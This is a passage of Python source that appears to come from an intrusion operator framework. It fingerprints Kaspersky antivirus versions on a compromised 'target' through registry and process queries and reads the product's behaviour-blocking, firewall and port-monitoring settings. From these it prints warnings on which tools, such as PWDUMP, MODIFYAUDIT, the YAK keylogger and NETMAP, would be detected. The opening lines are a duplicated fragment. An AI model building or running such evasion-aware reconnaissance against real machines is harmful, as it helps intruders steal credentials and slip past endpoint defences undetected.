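        shared.safePrint(('|      | %s | %s | %s |' % (portValue.ljust(6), portDesc.ljust(20), portEnabled.ljust(7))))
    shared.safePrint(portHeader)
    shared.safePrint(_KAS6_RULE)
    kasXmlFilePtr.write('\t</monitored_ports>\n')
    return True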
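def kasVerSixMp4(kasName, kasDescription, kasVersion, kasRoot):
    """Summarise Kaspersky 6 for Windows Workstations MP4 settings from the registry.

    Queries the ``avp80`` profile keys on target with ``registryquery``
    (behaviour-blocking rules, firewall state and protection level,
    TrafficMonitor port list), prints a console summary and writes the
    findings to ``kasperskyfile.xml`` in the local logs directory.
    ``kasDescription`` is accepted only so the signature matches the other
    version handlers; it is not used here.

    Args:
        kasName: product name (applications table or registry).
        kasDescription: unused.
        kasVersion: product version string.
        kasRoot: product root directory / process path.

    Returns:
        True. Failures of individual registry queries are reported on the
        console rather than raised.
    """
    doNotRun = '|  RUNNING PWDUMP OR MODIFYAUDIT IF YOU ARE AN EXECUTABLE'
    logDir = dsz.lp.GetLogsDirectory()
    pdmBase = 'software\\Kasperskylab\\protected\\avp80\\profiles\\Behavior_Blocking2\\profiles\\pdm2\\settings\\set\\'
    # (registry key, console label, text appended to doNotRun when the rule is on).
    # Order is the order the rows are printed and written to the XML.
    idsRules = [
        ('software\\Kasperskylab\\protected\\avp80\\profiles\\Behavior_Blocking2\\profiles\\regguard2',
         'REGISTRY GUARD',
         '\n|  LISTENING ON TARGET PORTS\n|  RUNNING HANDLE\n|  UNINSTALLING YAK OR DARKSKYLINE'),
        (pdmBase + '0015', 'SUSPICIOUS DNS REQUEST PROTECTION', '\n|  RUNNING NETMAP IF YOU ARE AN EXECUTABLE'),
        (pdmBase + '0000', 'P2P WORM PROTECTION', None),
        (pdmBase + '0001', 'TROJAN PROTECTION', None),
        (pdmBase + '0002', 'KEY LOGGER PROTECTION', '\n|  RUNNING YAK'),
        (pdmBase + '0003', 'HIDDEN DRIVER PROTECTION', None),
        (pdmBase + '0004', 'KERNEL MODIFICATION PROTECTION', None),
        (pdmBase + '0005', 'HIDDEN OBJECT PROTECTION', None),
        (pdmBase + '0006', 'HIDDEN PROCESS PROTECTION', None),
        (pdmBase + '0008', 'FILE MODIFICATION PROTECTION', None),
        (pdmBase + '0010', 'PROCESS INTRUSION PROTECTION', None),
        (pdmBase + '0011', 'IO REDIRECTION PROTECTION', None),
        (pdmBase + '0012', 'SUSPICIOUS REGISTRY ACCESS PROTECTION', None),
        (pdmBase + '0013', 'DATA XFER USING TRUSTED APP PROTECTION', None),
        (pdmBase + '0014', 'SUSPICIOUS SYSTEM ACTIVITY MONITOR', None),
        (pdmBase + '0016', 'PROTECTED STORAGE ACCESS PROTECTION', None),
    ]
    # Firewall "protectionlevel" values. The original if/elif chain tested '2'
    # twice, so the second branch was unreachable; what it was meant to map
    # (if anything) is not recoverable from the code -- TODO confirm against
    # the product's documented levels.
    fwLevels = {'1': 'HIGH', '2': 'TRAINING MODE', '3': 'LOW', '4': 'OFF'}
    fwStates = {'0': 'DISABLED', '1': 'ENABLED'}

    def _firstRegValue(regGetCmd):
        """Run one registryquery and return its first value string.

        Returns '' when the command fails or yields no value, so callers can
        fall through to an UNKNOWN display instead of raising IndexError on
        a missing key (the original indexed the result unguarded).
        """
        if not dsz.cmd.Run(regGetCmd, dsz.RUN_FLAG_RECORD):
            return ''
        try:
            values = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
        except Exception:
            # The original tolerated Get() raising on a missing value with a
            # bare except; presumably that is how absence is signalled.
            return ''
        if not values:
            return ''
        return values[0]

    # The original opened this file and never closed it; the context manager
    # guarantees the closing tags below are flushed even on an exception.
    with open((logDir + '\\kasperskyfile.xml'), 'w') as kasXmlFilePtr:
        kasXmlFilePtr.write('<kaspersky_settings>\n')
        kasXmlFilePtr.write('\t<vendor>KASPERSKY</vendor>\n')
        kasXmlFilePtr.write((('\t<version>' + shared.xmlScrub(kasVersion)) + '</version>\n'))
        kasXmlFilePtr.write((('\t<description>' + shared.xmlScrub(kasName)) + '</description>\n'))
        kasXmlFilePtr.write((('\t<root>' + shared.xmlScrub(kasRoot)) + '</root>\n'))
        shared.safePrint('+---------------------------------------------------------------------------------')
        shared.safePrint('|   THE SCRIPT HAS IDENTIFIED KASPERSKY VERSION 6 FOR WINDOWS WORKSTATIONS MP4.')
        shared.safePrint('|   THIS VERSION OF THE KASPERSKY SCRIPT USES REGISTRY QUERIES, BUT IS ONLY')
        shared.safePrint('|   A QUICK AND DIRTY REVIEW OF THE SETTINGS.')
        shared.safePrint('+---------------------------------------------------------------------------------')
        # NOTE(review): echo is switched off here and never switched back on
        # by this handler; the original behaved the same. Confirm whether the
        # calling harness restores it.
        dsz.control.echo.Off()
        # Recursive dump of the whole profiles key. Its result is not recorded
        # or read anywhere below; kept as in the original -- TODO confirm it is
        # still wanted (it costs a full recursive registry walk on target).
        dsz.cmd.Run('registryquery -hive l -key software\\Kasperskylab\\protected\\avp80\\profiles -recursive')
        shared.safePrint('+------------------------------------------+------------+------------+-----------+')
        headerCells = [
            shared.padOutput(40, 'IDS RULE DESCRIPTION'),
            shared.padOutput(10, 'STATUS'),
            shared.padOutput(10, 'LOGGING'),
            shared.padOutput(10, 'ACTION'),
        ]
        shared.safePrint(('| ' + ' | '.join(headerCells)) + '|')
        shared.safePrint('+------------------------------------------+------------+------------+-----------+')
        for regKey, ruleLabel, warning in idsRules:
            # compRegQuery prints the row and writes the XML entry itself; its
            # truthy return is what the original used to extend doNotRun.
            ruleActive = shared.compRegQuery('registryquery -hive l -key ' + regKey, ruleLabel, kasXmlFilePtr)
            if ruleActive and (warning is not None):
                doNotRun = (doNotRun + warning)
        shared.safePrint('+------------------------------------------+------------+------------+-----------+')
        shared.safePrint('|  FIREWALL SETTINGS')
        shared.safePrint('+--------------------------------------------------------------------------------+')
        fwEnabled = _firstRegValue('registryquery -hive l -key software\\Kasperskylab\\protected\\AVP80\\profiles\\Anti_Hacker\\profiles\\fw\\ -value enabled')
        shared.safePrint(('|   FIREWALL STATUS:                %s' % fwStates.get(fwEnabled, 'UNKNOWN')))
        fwLevel = _firstRegValue('registryquery -hive l -key software\\Kasperskylab\\protected\\AVP80\\profiles\\Anti_Hacker\\profiles\\fw\\settings -value protectionlevel')
        fwSetting = fwLevels.get(fwLevel, 'UNKNOWN')
        shared.safePrint(('|   PROTECTION LEVEL:               %s (%s)' % (fwSetting, fwLevel)))
        regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\protected\\avp80\\profiles\\TrafficMonitor\\settings\\Ports\\ -recursive'
        regName = []
        regValue = []
        portsOk = dsz.cmd.Run(regGetCmd, dsz.RUN_FLAG_RECORD)
        if portsOk:
            try:
                regName = dsz.cmd.data.Get('key::value::name', dsz.TYPE_STRING)
                regValue = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
            except Exception:
                portsOk = False
        if not portsOk:
            # The original also reset only one of the two lists here (typo
            # regVal/regValue); both are empty now so the loop below is a no-op.
            regName = []
            regValue = []
            shared.safePrint('+--------------------------------------------------------------------------------+')
            shared.safePrint('|  !!!ERROR CHECKING TrafficMonitor (PORT) SETTINGS; PROCEED WITH CAUTION!!!')
            shared.safePrint('+--------------------------------------------------------------------------------+')
        shared.safePrint('|   PORT MONITORING:')
        shared.safePrint('|      +--------+----------------------+---------+')
        shared.safePrint('|      | PORT   |    DESCRIPTION       |MONITORED|')
        shared.safePrint('|      +--------+----------------------+---------+')
        kasXmlFilePtr.write('\t<monitored_ports>\n')
        for i, valueName in enumerate(regName):
            # Each port's values arrive as <enabled>, <port>, <Description> in
            # that order, so both siblings are read relative to 'Description'.
            # A 'Description' at index 0 or 1 has no siblings; the original
            # would have wrapped around to the end of the list there.
            if (valueName != 'Description') or (i < 2):
                continue
            portValue = regValue[(i - 1)]
            portDesc = regValue[i]
            if (regValue[(i - 2)] == '1'):
                portEnabled = 'TRUE'
                # Scrubbed like the header fields; the port string comes
                # straight from the target's registry.
                kasXmlFilePtr.write((('\t\t<monitored_port>' + shared.xmlScrub(portValue)) + '</monitored_port>\n'))
            else:
                portEnabled = 'FALSE'
            # ljust reproduces the original pad-to-width loops (never truncates).
            shared.safePrint(('|      | %s | %s | %s |' % (portValue.ljust(6), portDesc.ljust(20), portEnabled.ljust(7))))
        shared.safePrint('|      +--------+----------------------+---------+')
        shared.safePrint('+--------------------------------------------------------------------------------+')
        # The original wrote a second opening <kaspersky_settings> tag here and
        # never closed <monitored_ports>, leaving malformed XML.
        kasXmlFilePtr.write('\t</monitored_ports>\n')
        kasXmlFilePtr.write('</kaspersky_settings>\n')
    shared.safePrint('| !!!WARNING!!! BASED ON THE ABOVE SETTINGS, DOING THE FOLLOWING WOULD BE STUPID:')
    shared.safePrint('+--------------------------------------------------------------------------------+')
    shared.safePrint(doNotRun)
    shared.safePrint('+--------------------------------------------------------------------------------+')
    return True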
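def main():
    """Fingerprint the Kaspersky product on target and dispatch to its handler.

    Reads the ``applications`` and ``processlist`` tables of ``target.db`` in
    the local logs directory. If that does not yield exactly one Kaspersky
    application, optionally falls back to registry queries under
    ``software\\KasperskyLab``. After confirming with the operator, calls the
    version-specific handler (``ver_six``, ``ver_nine``, ``ver_eleven``); for
    an unsupported version a minimal ``kasperskyfile.xml`` is written instead.

    Returns:
        False when the operator declines a prompt or no avp.exe process is
        listed; True otherwise (also after ``shared.errorBail``, matching the
        original control flow).
    """
    scriptVer = '1.0.0.6'
    logDir = dsz.lp.GetLogsDirectory()
    sysPid = 0
    usrPid = 0
    kasName = 'UNKNOWN'
    kasDescription = 'UNKNOWN'
    kasVersion = 'UNKNOWN'
    kasType = 'UNKNOWN'
    kasRoot = 'UNKNOWN'
    isWorkstation = False
    isInternetSec = False
    # Registry fallback table: (subkey pattern, console label, key, version
    # value, type value, root value or None). Patterns are substring matches on
    # the subkey name, as in the original; e.g. '.*9.*' would also match any
    # other AVP* subkey containing a 9 -- TODO confirm against real key names.
    kasRegProfiles = [
        ('.*6.*', 'v6', 'software\\KasperskyLab\\AVP6\\settings\\', 'Ins_ProductVersion', 'Ins_ProductType', None),
        ('.*80.*', 'v6 MP4', 'software\\KasperskyLab\\protected\\AVP80\\settings', 'Ins_ProductVersion', 'Ins_ProductType', None),
        ('.*9.*', 'v9 (AKA KASPERSKY 2010)', 'software\\KasperskyLab\\protected\\avp9\\environment', 'ProductVersion', 'ProductType', 'productroot'),
        ('.*11.*', 'v11 (AKA KASPERSKY 2011)', 'software\\KasperskyLab\\protected\\avp11\\environment', 'Ins_ProductVersion', 'Ins_ProductType', 'productroot'),
    ]

    def _regString(regCmd):
        """Run one registry query and return its first string value.

        Calls shared.errorBail and returns None when the command fails or
        returns no value; the caller then returns True exactly as the original
        inline code did after errorBail.
        """
        if (not dsz.cmd.Run(regCmd, dsz.RUN_FLAG_RECORD)):
            shared.errorBail(('FAILED TO RUN: ' + regCmd))
            return None
        tempVal = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
        if not tempVal:
            # The original indexed tempVal[0] unguarded and would have raised.
            shared.errorBail(('NO VALUE RETURNED BY: ' + regCmd))
            return None
        return tempVal[0]

    # Both SELECTs use constant patterns; nothing operator-controlled is
    # interpolated into the SQL.
    dbFile = (logDir + '\\target.db')
    con = sqlite3.connect(dbFile)
    try:
        con.row_factory = sqlite3.Row
        cur = con.cursor()
        cur.execute("SELECT NAME, DESCRIPTION, VERSION from applications where DESCRIPTION LIKE '%kaspersky%'")
        kasAppQuery = cur.fetchall()
        cur.execute("SELECT NAME, USER, PID, PATH from processlist where NAME like '%avp.exe'")
        kasProcQuery = cur.fetchall()
        cur.close()
    finally:
        # The original wrote `cur.close` / `con.close` without parentheses,
        # which referenced the methods but never called them.
        con.close()
    # The original also opened kasperskyfile.xml here and never used or closed
    # the handle; each version handler opens the file itself.
    myProc = shared.myProc()
    shared.safePrint('+---------------------------------------------------------------------------------')
    shared.safePrint('|   YOUR TARGET APPEARS TO BE RUNNING A KASPERSKYISH PSP!')
    shared.safePrint('|   FOLLOW WIKI GUIDELINES BASED ON VERSION AND TYPE LISTED BELOW!')
    shared.safePrint(('|   PLEASE REMEMBER YOUR PROCESS IS: ' + myProc))
    shared.safePrint(('|   SCRIPT VERSION: ' + scriptVer))
    shared.safePrint('+---------------------------------------------------------------------------------')
    numProcs = len(kasProcQuery)
    if (2 != numProcs):
        shared.safePrint('|   I APPEAR TO HAVE ENCOUNTERED A PROBLEM WITH THE PROC TABLE QUERY RESULTS...')
        shared.safePrint(('|    THERE SHOULD BE 2 PROCESSES RUNNING; I SEE %d!!!' % numProcs))
        for procRow in kasProcQuery:
            shared.safePrint(('|         %s\t\t%s\t\t%s' % (procRow[1], procRow[0], procRow[2])))
        if (0 == numProcs):
            shared.safePrint('|    NONE- WHY IS THIS SCRIPT RUNNING?!?!?!!?!?!')
            shared.safePrint('|    I AM EXITING BECAUSE I DO NOT THINK YOU HAVE KASPERSKY!')
            shared.safePrint('+---------------------------------------------------------------------------------')
            return False
        elif (1 == numProcs):
            shared.safePrint('|    I ONLY SEE ONE PROCESS RUNNING- THIS MAY BE BECAUSE NO USER IS LOGGED IN')
            shared.safePrint('|    REGARDLESSS, THIS IS NOT NORMAL, AND IF THIS IS KAS 2010 OR 2011 STOP NOW!')
        else:
            shared.safePrint('|    ADDITIONAL PROCESSES MAY BE DUE TO THE PRESENCE OF')
            shared.safePrint('|    AN UPDATE SERVER ON THIS BOX...')
            shared.safePrint('+---------------------------------------------------------------------------------')
        if (not dsz.ui.Prompt('ARE YOU SURE YOU WANT TO CONTINUE?', False)):
            return False
    numApps = len(kasAppQuery)
    if (1 != numApps):
        shared.safePrint('+---------------------------------------------------------------------------------')
        shared.safePrint('|   I APPEAR TO HAVE ENCOUNTERED A PROBLEM WITH THE APP TABLE QUERY RESULTS...')
        shared.safePrint(('|   THERE SHOULD BE 1 APPLICATION INSTALLED; I SEE %d:' % numApps))
        for appRow in kasAppQuery:
            shared.safePrint(('|         %s' % appRow[0]))
        if (0 == numApps):
            shared.safePrint('|        THERE ARE NO MATCHES...')
            shared.safePrint('|        CHANCES ARE GOOD THAT YOU ARE HERE BECAUSE YOUR BOX IS IN RUSSIAN...')
        else:
            shared.safePrint('|        YOU HAVE MULTIPLE KASPERSKY APPLICATIONS...')
            shared.safePrint('|        CHANCES ARE GOOD THAT YOU ARE HERE BECAUSE YOUR BOX IS AN UPDATE SERVER...')
        shared.safePrint('|   I HAVE FAILED TO FINGERPRINT WITH THE PRIMARY TECHNIQUE...')
        if dsz.ui.Prompt('WOULD YOU LIKE ME TO TRY AND FINGERPRINT USING REG KEYS (SECONDARY TECHNIQUE)?', True):
            shared.safePrint('|   QUERYING REGISTRY...')
            dsz.control.echo.Off()
            # try/finally so console echo is restored on the error returns
            # too; the original only restored it on the success path.
            try:
                regCmd = 'registryquery -hive L -key software\\KasperskyLab\\protected'
                if (not dsz.cmd.Run(regCmd, dsz.RUN_FLAG_RECORD)):
                    regCmd = 'registryquery -hive L -key software\\KasperskyLab'
                    shared.safePrint('FAILED FIRST REGQUERY')
                    if (not dsz.cmd.Run(regCmd, dsz.RUN_FLAG_RECORD)):
                        shared.errorBail(('FAILED TO RUN: ' + regCmd))
                        return True
                regName = dsz.cmd.data.Get('key::subkey::name', dsz.TYPE_STRING)
                numInstalls = 0
                for subKey in regName:
                    if (not re.match('.*AVP.*', subKey.upper())):
                        continue
                    # Independent ifs in the original, so a subkey matching
                    # several patterns is counted for each; preserved here
                    # (no break) so the multiple-PSP bail-out still fires.
                    for verPattern, verLabel, regKey, verValue, typeValue, rootValue in kasRegProfiles:
                        if (not re.match(verPattern, subKey)):
                            continue
                        numInstalls += 1
                        shared.safePrint(('|   LOOKS LIKE KASPERSKY ' + verLabel))
                        kasVersion = _regString(((('registryquery -hive L -key ' + regKey) + ' -value ') + verValue))
                        if (kasVersion is None):
                            return True
                        shared.safePrint(('|   VERSION: %s' % kasVersion))
                        kasType = _regString(((('registryquery -hive L -key ' + regKey) + ' -value ') + typeValue))
                        if (kasType is None):
                            return True
                        shared.safePrint(('|   TYPE: %s' % kasType))
                        if (rootValue is not None):
                            kasRoot = _regString(((('registryquery -hive L -key ' + regKey) + ' -value ') + rootValue))
                            if (kasRoot is None):
                                return True
                            shared.safePrint(('|   ROOT DIR: %s' % kasRoot))
                if (numInstalls > 1):
                    shared.errorBail('THERE ARE MULTIPLE KASPERSKY PSPS ON THE BOX!!!')
                    return True
            finally:
                dsz.control.echo.On()
    else:
        kasName = kasAppQuery[0][0]
        kasDescription = kasAppQuery[0][1]
        kasVersion = kasAppQuery[0][2]
        # NOTE(review): these two come from the processlist row (NAME, PATH),
        # not from the application row; kept as in the original.
        kasType = kasProcQuery[0][0]
        kasRoot = kasProcQuery[0][3]
    if (re.match('.*WORKSTATION.*', kasName.upper()) or ('WKS' == kasType.upper())):
        shared.safePrint('|   IT APPEARS TO BE FOR WORKSTATIONS....')
        isWorkstation = True
    if (re.match('.*SECURITY.*', kasName.upper()) or ('KIS' == kasType.upper())):
        shared.safePrint('|   IT APPEARS TO BE INTERNET SECURITY....')
        isInternetSec = True
    # USER column: 'SYSTEM' is matched case-sensitively upper-case and 'user'
    # lower-case, as in the original -- presumably that is how the processlist
    # table spells them; confirm before changing.
    for procRow in kasProcQuery:
        if re.match('.*SYSTEM.*', procRow[1]):
            sysPid = procRow[2]
        if re.match('.*user.*', procRow[1]):
            usrPid = procRow[2]
    shared.safePrint(('|       PRODUCT NAME:             %s' % kasName))
    shared.safePrint(('|       VERSION:                  %s' % kasVersion))
    # The original printed usrPid under the SYSTEM label and vice versa.
    shared.safePrint(('|       SYSTEM PID:               %d' % sysPid))
    shared.safePrint(('|       USER PID:                 %d' % usrPid))
    shared.safePrint('+---------------------------------------------------------------------------------')
    if (kasVersion != ''):
        kasVerSplit = kasVersion.split('.')
        majorVer = kasVerSplit[0]
        if (('6' == majorVer) and isWorkstation):
            # MP4 is told apart by the third version component, which a
            # short version string may not have (the original would IndexError).
            if ((len(kasVerSplit) > 2) and ('4' == kasVerSplit[2])):
                if dsz.ui.Prompt('MAY I CALL THE FUNCTION THAT HANDLES KASPERSKY 6 FOR WINDOWS WORKSTATIONS MP4?', True):
                    shared.safePrint('+---------------------------------------------------------------------------------')
                    shared.safePrint('|   CALLING FUNCTION TO HANDLE VERSION 6 MP4 FOR WINDOWS WORKSTATIONS....')
                    ver_six.kasVerSixMp4(kasName, kasDescription, kasVersion, kasRoot)
                else:
                    return False
            elif dsz.ui.Prompt('MAY I CALL THE FUNCTION THAT HANDLES KASPERSKY 6 FOR WINDOWS WORKSTATIONS (NOT MP4)?', True):
                shared.safePrint('+---------------------------------------------------------------------------------')
                shared.safePrint('|   CALLING FUNCTION TO HANDLE VERSION 6 FOR WINDOWS WORKSTATIONS (NOT MP4)....')
                ver_six.kasVerSix(kasName, kasDescription, kasVersion, kasRoot)
            else:
                return False
        elif (('9' == majorVer) and isInternetSec):
            if dsz.ui.Prompt('MAY I CALL THE FUNCTION THAT HANDLES KASPERSKY 9 (AKA 2010)?', True):
                shared.safePrint('+---------------------------------------------------------------------------------')
                shared.safePrint('|   CALLING FUNCTION TO HANDLE VERSION 9 (AKA 2010)....')
                ver_nine.kasVerNine(kasName, kasDescription, kasVersion, kasRoot)
            else:
                return False
        elif (('11' == majorVer) and isInternetSec):
            if dsz.ui.Prompt('MAY I CALL THE FUNCTION THAT HANDLES KASPERSKY 11 (AKA 2011)?', True):
                shared.safePrint('+---------------------------------------------------------------------------------')
                shared.safePrint('|   CALLING FUNCTION TO HANDLE VERSION 11 (AKA 2011)....')
                ver_eleven.kasVerEleven(kasName, kasDescription, kasVersion, kasRoot)
            else:
                return False
        else:
            shared.safePrint('|   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-')
            shared.safePrint('|   THIS VERSION APPEARS TO BE UNSUPPORTED.  PLEASE HARASS THOSE RESPONSIBLE.')
            shared.safePrint('|   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-')
            shared.safePrint('+---------------------------------------------------------------------------------')
            # Minimal record so downstream consumers of kasperskyfile.xml still
            # see vendor/version/root. The original closed <description> with
            # </vendor>, producing malformed XML.
            with open((logDir + '\\kasperskyfile.xml'), 'w') as kasXmlFilePtr:
                kasXmlFilePtr.write('<kaspersky_settings>\n')
                kasXmlFilePtr.write('<vendor>KASPERSKY</vendor>\n')
                kasXmlFilePtr.write((('<version>' + shared.xmlScrub(kasVersion)) + '</version>\n'))
                kasXmlFilePtr.write((('<description>' + shared.xmlScrub(kasName)) + '</description>\n'))
                kasXmlFilePtr.write((('<root>' + shared.xmlScrub(kasRoot)) + '</root>\n'))
                kasXmlFilePtr.write('</kaspersky_settings>\n')
    else:
        shared.safePrint(('ERRORED PARISNG %s FOR VERSION!' % kasVersion))
    return True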